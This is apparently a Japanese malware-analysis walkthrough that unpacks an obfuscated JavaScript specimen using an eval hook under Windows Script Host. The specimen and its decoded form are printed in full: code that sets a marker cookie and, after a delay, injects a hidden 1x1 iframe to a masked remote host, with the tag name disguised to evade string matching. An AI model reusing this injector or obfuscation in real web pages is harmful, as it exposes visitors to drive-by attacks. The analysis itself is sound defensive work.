検体
// Specimen, kept exactly as received: a dictionary-packed script.
//  - p is the payload template; every whole-word decimal number in it is an
//    index into k.
//  - The while loop walks c from 38 down to 0 and replaces each \bc\b in p
//    with k[c]. Empty entries (k[0], k[1], k[24]) are skipped, so those
//    numbers stay in the payload as literal numbers.
//  - p, c and k are assigned without var, i.e. they are implicit globals.
//  - eval is handed a function object, not a string. eval returns a non-string
//    argument unchanged, so in this form packd is not invoked and p is never
//    evaluated; only the unpacking stage is visible here.
// NOTE(review): k[33] reads "ac" on this line but "yy" in the later listings —
// presumably the host name was masked for publication; treat the decoded URL
// as a placeholder, not as an indicator.
eval(function packd() {p = '15(3.10.14("5")==-1) {8 4=13 17();4.19(4.22()+24*9*9*7);3.10="5=20;21=" +4.16();12(11(){8 2=3.18(/32/.6+/23/.6);2.37="1";2.38="1";2.34="0";2.36="//35.33.27/26/25/28/29/";3.31.30(2)},7)}';c = 39;k = ["","","_ifr","document","_d","GOOGLE","source","1000","var","60","cookie","function","setTimeout","new","indexOf","if","toGMTString","Date","CreateElement","setTime","123GOOGLE456","expires","getTime","me","","menu","ybk","jp","inet","image","appendChild","body","ifra","ac","frameborder","xxxx","src","width","height"]; while(c--){if(k[c]) {p = p.replace(new RegExp('\\b'+c+'\\b','g'),k[c]);}}})
見た感じだめそうだけど,evalの中身を可視化する
検体の頭に3行追加して
// Analysis hook: replace the global eval so that whatever the specimen hands
// to it is printed by Windows Script Host instead of being evaluated.
// Only eval is intercepted; every other statement of the specimen still runs
// on the analysis host, so use a disposable, isolated machine for this step.
eval = function (payload) {
    WScript.Echo(payload);
};
実行すると
>cscript 1.js
Microsoft (R) Windows Script Host Version 5.812
Copyright (C) Microsoft Corporation. All rights reserved.
function packd() {p = '15(3.10.14("5")==-1) {8 4=13 17();4.19(4.22()+24*9*9*7);3.10="5=20;21=" +4.16();12(11(){8 2=3.18(/32/.6+/23/.6);2.37="1";2.38="1";2.34="0";2.36="//35.33.27/26/25/28/29/";3.31.30(2)},7)}';c = 39;k = ["","","_ifr","document","_d","GOOGLE","source","1000","var","60","cookie","function","setTimeout","new","indexOf","if","toGMTString","Date","CreateElement","setTime","123GOOGLE456","expires","getTime","me","","menu","ybk","jp","inet","image","appendChild","body","ifra","yy","frameborder","xxxx","src","width","height"]; while(c--){if(k[c]) {p = p.replace(new RegExp('\\b'+c+'\\b','g'),k[c]);}}}
人力で見た目をよくする(むやみにネットに検体を投げてはいけない)
// Hand-formatted copy of the function printed by the eval hook.
// It only rebuilds the payload text in the global p; nothing here evaluates p
// and nothing on this page calls packd() until the analyst adds a call.
function packd() {
// Payload template: each whole-word decimal number is an index into k.
p = '15(3.10.14("5")==-1) {8 4=13 17();4.19(4.22()+24*9*9*7);3.10="5=20;21=" +4.16();12(11(){8 2=3.18(/32/.6+/23/.6);2.37="1";2.38="1";2.34="0";2.36="//35.33.27/26/25/28/29/";3.31.30(2)},7)}';
// Number of dictionary entries; the loop below visits indices 38 down to 0.
c = 39;
// Dictionary of identifiers and string fragments. Entries 0, 1 and 24 are
// empty, so the numbers 0, 1 and 24 remain literal numbers in the payload.
k = ["","","_ifr","document","_d","GOOGLE","source","1000","var","60","cookie","function","setTimeout","new","indexOf","if","toGMTString","Date","CreateElement","setTime","123GOOGLE456","expires","getTime","me","","menu","ybk","jp","inet","image","appendChild","body","ifra","yy","frameborder","xxxx","src","width","height"];
// c-- tests the old value and then decrements, so the body sees 38..0 and c
// is left at -1 when the loop ends.
while(c--){
// Skip empty dictionary slots (an empty string is falsy).
if(k[c]) {
// \b on both sides limits the match to the whole number, so index 3 does not
// rewrite the "3" inside 13 or 30; the g flag replaces every occurrence.
p = p.replace(new RegExp('\\b'+c+'\\b','g'),k[c]);
}
}
}
実行した時に p の値を出力するように改造
// Instrumented copy of the unpacker: identical decoding logic, plus one line
// that prints the decoded payload and one top-level call that runs it.
// The payload is only printed as text; it is never passed to eval here.
function packd() {
// Payload template: each whole-word decimal number is an index into k.
p = '15(3.10.14("5")==-1) {8 4=13 17();4.19(4.22()+24*9*9*7);3.10="5=20;21=" +4.16();12(11(){8 2=3.18(/32/.6+/23/.6);2.37="1";2.38="1";2.34="0";2.36="//35.33.27/26/25/28/29/";3.31.30(2)},7)}';
// Number of dictionary entries; the loop below visits indices 38 down to 0.
c = 39;
// Dictionary of identifiers and string fragments; empty entries are skipped
// by the loop, so their index numbers stay as literal numbers in the payload.
k = ["","","_ifr","document","_d","GOOGLE","source","1000","var","60","cookie","function","setTimeout","new","indexOf","if","toGMTString","Date","CreateElement","setTime","123GOOGLE456","expires","getTime","me","","menu","ybk","jp","inet","image","appendChild","body","ifra","yy","frameborder","xxxx","src","width","height"];
while(c--){
if(k[c]) {
// Whole-word, global replacement of the index c by its dictionary entry.
p = p.replace(new RegExp('\\b'+c+'\\b','g'),k[c]);
}
}
// Print the fully substituted payload through Windows Script Host.
WScript.Echo(p); // added
}
// The specimen itself never invokes packd, so the analyst calls it explicitly.
packd() // added
実行してみる
>cscript 1.js
Microsoft (R) Windows Script Host Version 5.812
Copyright (C) Microsoft Corporation. All rights reserved.
if(document.cookie.indexOf("GOOGLE")==-1) {var _d=new Date();_d.setTime(_d.getTime()+24*60*60*1000);document.cookie="GOOGLE=123GOOGLE456;expires=" +_d.toGMTString();setTimeout(function(){var _ifr=document.CreateElement(/ifra/.source+/me/.source);_ifr.width="1";_ifr.height="1";_ifr.frameborder="0";_ifr.src="//xxxx.yy.jp/ybk/menu/inet/image/";document.body.appendChild(_ifr)},1000)}
整形すると
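// Decoded payload, reformatted for reading only. Identifiers and literals are
// kept exactly as the decoder printed them; the cookie string is kept on one
// line because splitting a quoted string across lines is not valid script and
// misrepresents the value that gets written.
//
// What the code does, for triage and detection:
//  - Marker cookie: the body runs only when document.cookie does not contain
//    "GOOGLE"; it then sets GOOGLE=123GOOGLE456 with a 24-hour expiry, so a
//    given browser is hit at most once per day.
//  - After a 1000 ms delay it builds an element whose tag name is assembled
//    from two regex .source values (/ifra/ + /me/), so the literal word
//    "iframe" never appears in the script text and plain string matching on
//    it will miss this sample.
//  - The element is sized 1x1 with no border and appended to document.body,
//    pointing at a protocol-relative URL.
// The host in src is masked on this page (xxxx.yy.jp); the cookie name/value
// pair and the path are the usable indicators shown here.
if (document.cookie.indexOf("GOOGLE") == -1) {
    var _d = new Date();
    // now + 24 h, in milliseconds
    _d.setTime(_d.getTime() + 24 * 60 * 60 * 1000);
    document.cookie = "GOOGLE=123GOOGLE456;expires=" + _d.toGMTString();
    setTimeout(
        function () {
            var _ifr = document.CreateElement(/ifra/.source + /me/.source);
            _ifr.width = "1";
            _ifr.height = "1";
            _ifr.frameborder = "0";
            _ifr.src = "//xxxx.yy.jp/ybk/menu/inet/image/";
            document.body.appendChild(_ifr)
        },
        1000)
}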